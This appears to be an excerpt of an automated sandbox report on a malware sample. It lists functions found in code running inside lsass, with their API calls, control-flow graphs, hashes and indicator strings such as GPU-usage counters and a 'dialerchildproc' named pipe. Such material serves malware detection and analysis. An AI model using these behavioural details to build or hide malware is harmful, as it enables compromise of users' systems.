                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED2EC
                                                                  • SetLastError.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED307
                                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED33D
                                                                  • FlsSetValue.KERNEL32(?,?,00000001,00000202C0AEF0FC,?,?,?,?,00000202C0AEC3CF,?,?,?,?,?,00000202C0AE7EE0), ref: 00000202C0AED35C
                                                                    • Part of subcall function 00000202C0AEDAFC: HeapAlloc.KERNEL32(?,?,00000000,00000202C0AED432,?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AEDB51
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED384
                                                                    • Part of subcall function 00000202C0AEDB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000202C0AE643A), ref: 00000202C0AEDB8A
                                                                    • Part of subcall function 00000202C0AEDB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000202C0AE643A), ref: 00000202C0AEDB94
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED395
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED3A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 570795689-0
                                                                  • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction ID: f410c08f16195d7feb55c0acab90937f6d3a32cbd58bd7616d863ef084d28fbd
                                                                  • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                                  • Instruction Fuzzy Hash: 634171203013C5C6FD58A73555DD76D22429B497F4F174B2BEFBA0F6D7EE28886A8201
                                                                  Function 00000202C0AE2FAC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Running Time
                                                                  • API String ID: 1943346504-1805530042
                                                                  • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction ID: 5bf1902dd2c0bb3d590e3c39ec1bf0b48186cc81f85eaad6962f89ffe1acfc31
                                                                  • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                                  • Instruction Fuzzy Hash: A9319333A04B80C6F720DF22A88C75DA3A0F788BD5F4642279F8943B66DF38C5698740
                                                                  Function 00000202C0AE30BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                                  • API String ID: 1943346504-3507739905
                                                                  • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction ID: 5d3e7fe486244f146b54635b0d1212027529e81a6e1483a88afd0d30f5ccc161
                                                                  • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                                  • Instruction Fuzzy Hash: F8315C22618B81C6FB50DF26A8CC75DA3A5F784F85F06422B9F9A43726DF38D8598700
                                                                  Function 00000202C0AB9D74 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction ID: e17db8edfc6197daea080600bf38c591281c30dd8c0174fdc7d504c14fdcd248
                                                                  • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                                  • Instruction Fuzzy Hash: 05E17A72604B40CAFB60DF69A48C39D7BA0F755B98F114217EF8957B9ACB34D598C700
                                                                  Function 00000202C0AEA974 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 441 202c0aea974-202c0aea9dc call 202c0aeb844 444 202c0aea9e2-202c0aea9e5 441->444 445 202c0aeae43-202c0aeae4b call 202c0aecb78 441->445 444->445 447 202c0aea9eb-202c0aea9f1 444->447 449 202c0aeaac0-202c0aeaad2 447->449 450 202c0aea9f7-202c0aea9fb 447->450 451 202c0aeaad8-202c0aeaadc 449->451 452 202c0aead93-202c0aead97 449->452 450->449 453 202c0aeaa01-202c0aeaa0c 450->453 451->452 457 202c0aeaae2-202c0aeaaed 451->457 455 202c0aeadd0-202c0aeadda call 202c0ae9a64 452->455 456 202c0aead99-202c0aeada0 452->456 453->449 454 202c0aeaa12-202c0aeaa17 453->454 454->449 459 202c0aeaa1d-202c0aeaa27 call 202c0ae9a64 454->459 455->445 469 202c0aeaddc-202c0aeadfb call 202c0ae7d70 455->469 456->445 460 202c0aeada6-202c0aeadcb call 202c0aeae4c 456->460 457->452 458 202c0aeaaf3-202c0aeaafa 457->458 462 202c0aeab00-202c0aeab37 call 202c0ae9e40 458->462 463 202c0aeacc4-202c0aeacd0 458->463 459->469 472 202c0aeaa2d-202c0aeaa58 call 202c0ae9a64 * 2 call 202c0aea154 459->472 460->455 462->463 478 202c0aeab3d-202c0aeab45 462->478 463->455 470 202c0aeacd6-202c0aeacda 463->470 474 202c0aeacdc-202c0aeace8 call 202c0aea114 470->474 475 202c0aeacea-202c0aeacf2 470->475 509 202c0aeaa5a-202c0aeaa5e 472->509 510 202c0aeaa78-202c0aeaa82 call 202c0ae9a64 472->510 474->475 485 202c0aead0b-202c0aead13 474->485 475->455 477 202c0aeacf8-202c0aead05 call 202c0ae9ce4 475->477 477->455 477->485 483 202c0aeab49-202c0aeab7b 478->483 487 202c0aeab81-202c0aeab8c 483->487 488 202c0aeacb7-202c0aeacbe 483->488 490 202c0aead19-202c0aead1d 485->490 491 202c0aeae26-202c0aeae42 call 202c0ae9a64 * 2 call 202c0aecad8 485->491 487->488 492 202c0aeab92-202c0aeabab 487->492 488->463 488->483 494 202c0aead30 490->494 495 202c0aead1f-202c0aead2e call 202c0aea114 490->495 491->445 496 202c0aeabb1-202c0aeabf6 call 202c0aea128 * 2 492->496 497 202c0aeaca4-202c0aeaca9 492->497 505 202c0aead33-202c0aead3d call 202c0aeb8dc 494->505 495->505 524 202c0aeabf8-202c0aeac1e call 202c0aea128 call 202c0aeb068 496->524 525 202c0aeac34-202c0aeac3a 496->525 502 202c0aeacb4 497->502 502->488 505->455 521 202c0aead43-202c0aead91 call 202c0ae9d74 call 202c0ae9f80 505->521 509->510 514 202c0aeaa60-202c0aeaa6b 509->514 510->449 523 202c0aeaa84-202c0aeaaa4 call 202c0ae9a64 * 2 call 202c0aeb8dc 510->523 514->510 520 202c0aeaa6d-202c0aeaa72 514->520 520->445 520->510 521->455 547 202c0aeaabb 523->547 548 202c0aeaaa6-202c0aeaab0 call 202c0aeb9cc 523->548 541 202c0aeac20-202c0aeac32 524->541 542 202c0aeac45-202c0aeaca2 call 202c0aea8a0 524->542 529 202c0aeac3c-202c0aeac40 525->529 530 202c0aeacab 525->530 529->496 534 202c0aeacb0 530->534 534->502 541->524 541->525 542->534 547->449 551 202c0aeae20-202c0aeae25 call 202c0aecad8 548->551 552 202c0aeaab6-202c0aeae1f call 202c0ae96dc call 202c0aeb424 call 202c0ae98d0 548->552 551->491 552->551
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                  • String ID: csm$csm$csm
                                                                  • API String ID: 849930591-393685449
                                                                  • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction ID: 9af3ddf56590a485978cac2ffc13644fed0e984cc27883960e106c504c4bc76f
                                                                  • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                                  • Instruction Fuzzy Hash: C2E17C72600B80CAFB20DB6594CC39D37A4F796B88F124517EFA957B9ACB34D5A9C700
                                                                  Function 00000202C0AEF7C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 562 202c0aef7c4-202c0aef816 563 202c0aef81c-202c0aef81f 562->563 564 202c0aef907 562->564 565 202c0aef821-202c0aef824 563->565 566 202c0aef829-202c0aef82c 563->566 567 202c0aef909-202c0aef925 564->567 565->567 568 202c0aef8ec-202c0aef8ff 566->568 569 202c0aef832-202c0aef841 566->569 568->564 570 202c0aef851-202c0aef870 LoadLibraryExW 569->570 571 202c0aef843-202c0aef846 569->571 574 202c0aef926-202c0aef93b 570->574 575 202c0aef876-202c0aef87f GetLastError 570->575 572 202c0aef84c 571->572 573 202c0aef946-202c0aef955 GetProcAddress 571->573 576 202c0aef8d8-202c0aef8df 572->576 578 202c0aef957-202c0aef97e 573->578 579 202c0aef8e5 573->579 574->573 577 202c0aef93d-202c0aef940 FreeLibrary 574->577 580 202c0aef881-202c0aef898 call 202c0aecd58 575->580 581 202c0aef8c6-202c0aef8d0 575->581 576->569 576->579 577->573 578->567 579->568 580->581 584 202c0aef89a-202c0aef8ae call 202c0aecd58 580->584 581->576 584->581 587 202c0aef8b0-202c0aef8c4 LoadLibraryExW 584->587 587->574 587->581
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeLibraryProc
                                                                  • String ID: api-ms-$ext-ms-
                                                                  • API String ID: 3013587201-537541572
                                                                  • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction ID: 12418b3ded53c4190658a1cf896c70053481940a3e587dd9996ceed7dc0a2fc5
                                                                  • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                                  • Instruction Fuzzy Hash: 0A413422311B90D1FB16CB66A88C75D2395FB08BE0F0A41278EAE87796EF39C45DC340
                                                                  Function 00000202C0AE104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                  • String ID: d
                                                                  • API String ID: 3743429067-2564639436
                                                                  • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction ID: 26155b065d5d49fbc65426973210cc8d912e4c2e795746c6e68801dfcec21a53
                                                                  • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                                  • Instruction Fuzzy Hash: 66414F73214B80C6E760CF61E48C79EB7A5F388B98F45822ADB8907759DF39C599CB40
                                                                  Function 00000202C0AED498 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FlsGetValue.KERNEL32(?,?,?,00000202C0AECC0E,?,?,?,?,?,?,?,?,00000202C0AED3CD,?,?,00000001), ref: 00000202C0AED4B7
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AECC0E,?,?,?,?,?,?,?,?,00000202C0AED3CD,?,?,00000001), ref: 00000202C0AED4D6
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AECC0E,?,?,?,?,?,?,?,?,00000202C0AED3CD,?,?,00000001), ref: 00000202C0AED4FE
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AECC0E,?,?,?,?,?,?,?,?,00000202C0AED3CD,?,?,00000001), ref: 00000202C0AED50F
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AECC0E,?,?,?,?,?,?,?,?,00000202C0AED3CD,?,?,00000001), ref: 00000202C0AED520
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID: 1%$Y%
                                                                  • API String ID: 3702945584-1395475152
                                                                  • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction ID: ccb3c328c1cc4f3dc6c269ba102d6e366637f7e722823d4bcdc7d35ecbba9f32
                                                                  • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                                  • Instruction Fuzzy Hash: 5F1186607053C0C1FE58972565DD76D2141AB847F8F57473BEABE0B7D7EE28C86A4600
                                                                  Function 00000202C0AE2334 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                  • String ID: \\.\pipe\dialerchildproc
                                                                  • API String ID: 166002920-1933775637
                                                                  • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction ID: ab9853ce45aa3ae5ff0ab0df34c8b3cd04aee3897dc18913666e061f4019053a
                                                                  • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                                  • Instruction Fuzzy Hash: 0A114932614B40C2F7108B21F48C75E6765F389BE5F618317EBAA06AA9CF7DC549CB04
                                                                  Function 00000202C0AE7940 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID:
                                                                  • API String ID: 190073905-0
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: 91999e882ef8325bf4855b1169034fd288f1a2cdee68592838d125f65ce938f6
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: 2481F6217003C1C6FB58AB65A8CD35D6290AB85B84F174527EBE947797EB38CA6E8700
                                                                  Function 00000202C0AEA1F4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AEA3B3,?,?,?,00000202C0AE9B9C,?,?,?,?,00000202C0AE96BD), ref: 00000202C0AEA279
                                                                  • GetLastError.KERNEL32(?,?,?,00000202C0AEA3B3,?,?,?,00000202C0AE9B9C,?,?,?,?,00000202C0AE96BD), ref: 00000202C0AEA287
                                                                  • LoadLibraryExW.KERNEL32(?,?,?,00000202C0AEA3B3,?,?,?,00000202C0AE9B9C,?,?,?,?,00000202C0AE96BD), ref: 00000202C0AEA2B1
                                                                  • FreeLibrary.KERNEL32(?,?,?,00000202C0AEA3B3,?,?,?,00000202C0AE9B9C,?,?,?,?,00000202C0AE96BD), ref: 00000202C0AEA2F7
                                                                  • GetProcAddress.KERNEL32(?,?,?,00000202C0AEA3B3,?,?,?,00000202C0AE9B9C,?,?,?,?,00000202C0AE96BD), ref: 00000202C0AEA303
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                  • String ID: api-ms-
                                                                  • API String ID: 2559590344-2084034818
                                                                  • Opcode ID: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction ID: 808902013ebb169969ef197a4e5551ff5a11589a7928ddab1bd50d4f78d156e4
                                                                  • Opcode Fuzzy Hash: c60201aec778344204bcef1649fbeec24da53dc38ebde7e62b727d681ed7f771
                                                                  • Instruction Fuzzy Hash: 2231B822312B80D2FE129B46A88C79D2394B759B60F5B0627DF7E1B3A2DF39D55D8310
                                                                  Function 00000202C0AF41E4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                  • String ID: CONOUT$
                                                                  • API String ID: 3230265001-3130406586
                                                                  • Opcode ID: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction ID: 08d3d89060055010cc9f927f2846b741d570c307bee51878ed60177e71e4ad34
                                                                  • Opcode Fuzzy Hash: 825ce686359a22e25232def11d6f08b48dee252c530cecc749e4dc9d381a3549
                                                                  • Instruction Fuzzy Hash: F4116D22310B40C6F7908B52E89C75D66A4F788FE8F164227EB5E877A6DF39C9088744
                                                                  Function 00000202C0AE3BC0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                  • String ID: wr
                                                                  • API String ID: 1092925422-2678910430
                                                                  • Opcode ID: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
                                                                  • Instruction ID: 76476dfaa64f7254c59cc74631256a4baa4f38b64316a815edb2c724ca880be3
                                                                  • Opcode Fuzzy Hash: 1983e7b2aaee179c95f49a9ecb428acdca8d3318c5669cc08ca5f07c1a06eaeb
